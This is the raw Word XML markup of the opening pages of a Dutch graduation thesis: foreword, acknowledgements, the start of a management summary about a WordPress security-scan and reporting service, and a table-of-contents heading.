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AA0D"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E2204E" w:rsidRPr="00B9198F" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B9198F">
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>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E2204E" w:rsidRPr="00B9198F" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B9198F">
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Mohamed El Kawakibi</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E2204E" w:rsidRPr="00B9198F" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00B9198F" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00B9198F" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00B9198F" w:rsidRDefault="00E2204E"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2692"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8B86"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13E3"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FA76"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8956"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0B786569" w14:textId="19CDF6E4" w:rsidR="00594BF5" w:rsidRDefault="00CA3CAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253327360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30624BE6" wp14:editId="31AA139B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-714645</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="915" name="Rectangle 9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8F803" id="Rectangle 915" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.6pt;margin-top:-56.2pt;width:25pt;height:1031.7pt;z-index:-2499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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="70054A69" w14:textId="6C30738E" w:rsidR="00594BF5" w:rsidRDefault="00594BF5" w:rsidP="00594BF5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Voorwoord</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4841A4D7" w14:textId="53538394" w:rsidR="00594BF5" w:rsidRDefault="00B12579" w:rsidP="00E86E02">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253185024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="721107D6" wp14:editId="724AF5EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-71755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2707640</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5650865" cy="459740"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="782" name="Text Box 782"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="56508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6B730" w14:textId="0C81F69D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Ik wens de lezers van mijn scriptie veel leesplezier en ik hoop dat jullie er wat van kunnen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07D6" id="Text Box 782" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.65pt;margin-top:213.2pt;width:444.95pt;height:36.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0086B730" w14:textId="0C81F69D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Ik wens de lezers van mijn scriptie veel leesplezier en ik hoop dat jullie er wat van kunnen leren.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253184000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12333A6A" wp14:editId="2CC254BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-73660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1112520</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5904865" cy="1488440"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="780" name="Text Box 780"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="590486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ABEEC" w14:textId="2BA35792" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Hierbij wil ik graag mijn bedrijfsbegeleider Pim Ruiter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E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Ik wil mijn stagebegeleider Gerlof Donga bedanken voor zijn begeleiding en bereidheid om mij te helpen wanneer ik het nodig had tijdens mijn afstudeertraject. Ook wil ik Salahdinn El Kawakibi bedanken voor zijn hulp bij het ontwerpen van mijn scri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A6A" id="Text Box 780" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.8pt;margin-top:87.6pt;width:464.95pt;height:117.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0C3ABEEC" w14:textId="2BA35792" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Hierbij wil ik graag mijn bedrijfsbegeleider Pim Ruiter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E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Ik wil mijn stagebegeleider Gerlof Donga bedanken voor zijn begeleiding en bereidheid om mij te helpen wanneer ik het nodig had tijdens mijn afstudeertraject. Ook wil ik Salahdinn El Kawakibi bedanken voor zijn hulp bij het ontwerpen van mijn scriptie.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253182976" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35636F35" wp14:editId="6A2A2476">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-74295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>195580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5905500" cy="802640"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="779" name="Text Box 779"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="59055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891AF" w14:textId="014A3189" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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36F35" id="Text Box 779" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.85pt;margin-top:15.4pt;width:465pt;height:63.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2CA891AF" w14:textId="014A3189" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="662CA841" w14:textId="0899A22E" w:rsidR="0044790A" w:rsidRDefault="00B23545" w:rsidP="00594BF5">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253235200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08EF7650" wp14:editId="53DCA96F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-71755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2908935</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2222500" cy="33274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2250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5D104" w14:textId="02B79D56" w:rsidR="00E2204E" w:rsidRPr="00B23545" w:rsidRDefault="00E2204E"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F7650" id="Text Box 203" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.65pt;margin-top:229.05pt;width:175pt;height:26.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0165D104" w14:textId="02B79D56" w:rsidR="00E2204E" w:rsidRPr="00B23545" w:rsidRDefault="00E2204E"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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0044790A">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5983CC64" w14:textId="00355B78" w:rsidR="0044790A" w:rsidRDefault="00133264" w:rsidP="00A248C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253256704" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0425CAC3" wp14:editId="13AB42E8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-713105</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="243" name="Rectangle 2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D4CB0" id="Rectangle 243" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.7pt;margin-top:-56.1pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D588E" w14:textId="23E502CE" w:rsidR="00A248C1" w:rsidRDefault="000D7903" w:rsidP="00A248C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253176832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14970EA9" wp14:editId="6290B073">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-71755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>593090</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3112135" cy="31902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3112135" cy="319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7F239" w14:textId="3F103965" w:rsidR="00E2204E" w:rsidRPr="00142053" w:rsidRDefault="00E2204E">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0EA9" id="Text Box 62" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:-5.65pt;margin-top:46.7pt;width:245.05pt;height:251.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1F07F239" w14:textId="3F103965" w:rsidR="00E2204E" w:rsidRPr="00142053" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00411CD7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253181952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29E21C10" wp14:editId="4342C10F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3166110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>590550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3112135" cy="2745740"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="767" name="Text Box 767"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="31121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A1AC6" w14:textId="23CA24BB" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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1C10" id="Text Box 767" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:249.3pt;margin-top:46.5pt;width:245.05pt;height:216.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="652A1AC6" w14:textId="23CA24BB" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001C7F56">
        <w:t>Management</w:t>
      </w:r>
      <w:r w:rsidR="00A248C1">
        <w:t>samenvatting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F98AB8F" w14:textId="63B373A2" w:rsidR="00A248C1" w:rsidRDefault="00A248C1" w:rsidP="00A248C1"/>
    <w:p w14:paraId="2EFA5F4C" w14:textId="76680595" w:rsidR="00A248C1" w:rsidRPr="00A248C1" w:rsidRDefault="000D7903" w:rsidP="00A248C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253177856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="549AB648" wp14:editId="1EA23CA5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-79375</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>149225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2794635" cy="459740"/>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794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B7736" w14:textId="59C3CF18" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>De hoofdvraag die ik binnen dit afstudeerproject zal beantwoorden luidt:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="36702ADE" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="520BE022" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="08294A50" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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48" id="Text Box 217" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-6.25pt;margin-top:11.75pt;width:220.05pt;height:36.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RT3wCAABk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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="660B7736" w14:textId="59C3CF18" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>De hoofdvraag die ik binnen dit afstudeerproject zal beantwoorden luidt:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="36702ADE" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="520BE022" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="08294A50" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="26612AC0" w14:textId="114763FE" w:rsidR="00A248C1" w:rsidRDefault="000D7903" w:rsidP="00A248C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253179904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4081F05E" wp14:editId="6F348126">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-69850</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1209040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3048635" cy="3431540"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="732" name="Text Box 732"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="304863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D2905" w14:textId="546C1FEB" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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F05E" id="Text Box 732" o:spid="_x0000_s1035" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.5pt;margin-top:95.2pt;width:240.05pt;height:270.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H9HwCAABl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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="705D2905" w14:textId="546C1FEB" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253180928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="616B4B77" wp14:editId="7AD3C84F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3168015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1219200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3112135" cy="1945640"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="754" name="Text Box 754"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="31121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FF6CD" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2D5B883C" w14:textId="3ADBF389" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t xml:space="preserve">SecurityReport en Pandora werken samen om de Wordpress gebruiker een gebruikersvriendelijke ervaring te bieden bij het aanvragen van een scan tot aan het ontvangen van het ra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4B77" id="Text Box 754" o:spid="_x0000_s1036" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:249.45pt;margin-top:96pt;width:245.05pt;height:153.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="32EFF6CD" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2D5B883C" w14:textId="3ADBF389" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t xml:space="preserve">SecurityReport en Pandora werken samen om de Wordpress gebruiker een gebruikersvriendelijke ervaring te bieden bij het aanvragen van een scan tot aan het ontvangen van het rapport. </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253178880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EFC3317" wp14:editId="253584E6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-78105</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>411480</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5905500" cy="688340"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="719" name="Text Box 719"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="59055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47543" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E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3317" id="Text Box 719" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-6.15pt;margin-top:32.4pt;width:465pt;height:54.2pt;z-index:2531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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="36747543" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2E3ABE" w14:textId="015AA507" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="907"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D79BA50" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6356507D" w14:textId="5350B00D" w:rsidR="00CA3CAE" w:rsidRDefault="00F64E00" w:rsidP="00CA3CAE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="907"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253332480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BBF07C3" wp14:editId="3A1F1BF7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897820</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-607608</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="918" name="Rectangle 91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1F7A" id="Rectangle 918" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.7pt;margin-top:-47.8pt;width:25pt;height:1031.7pt;z-index:-2499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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ABCFE2" w14:textId="221D263D" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
    <w:p w14:paraId="58CA56BA" w14:textId="4AA0ABE0" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Inhoudsopgave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47883F81" w14:textId="60A0A25F" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253330432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AFC395B" wp14:editId="7FA734A6">
